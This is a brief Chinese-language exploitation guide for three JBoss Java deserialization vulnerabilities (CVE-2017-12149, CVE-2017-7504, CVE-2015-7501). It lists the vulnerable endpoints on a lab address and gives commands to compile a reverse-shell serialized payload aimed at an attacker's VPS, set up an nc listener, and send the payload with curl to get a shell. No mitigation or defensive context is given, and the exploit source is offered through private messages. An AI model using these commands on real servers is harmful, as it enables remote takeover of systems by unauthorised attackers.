JBOSS AS 6.x反序列化(CVE-2017-12149)
漏洞影响5.x和6.x版本的JBOSSAS
1、检测目录 192.168.28.138:60899/invoker/readonly
2、Linux下编译java代码,然后生成反弹shell序列化文件,内容较长,可私信“jboss”获取代码
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.javajava -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap your_vps_ip:8888
3、nc监听上述反弹shell端口
4、向目标发送生成的序列化文件即可收到反弹shell
curl http://192.168.28.138:60899/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
5、接收反弹shell
JBOSS AS 4.x JbossMQ JMS反序列化(CVE-2017-7504)
影响范围:JBoss AS 4.x及之前版本。跟CVE-2017-12149使用同样的payload
1、检测目录192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet
2、nc监听
3、发送payload getshell
curl http://192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
4、接收反弹shell
JBOSS Java反序列化(CVE-2015-7501)
也就是15年出来的Java反序列化漏洞
1、检测目录192.168.28.138:57287/invoker/JMXInvokerServlet
2、直接利用Java反序列化工具即可
私信“jboss”获取利用代码及工具。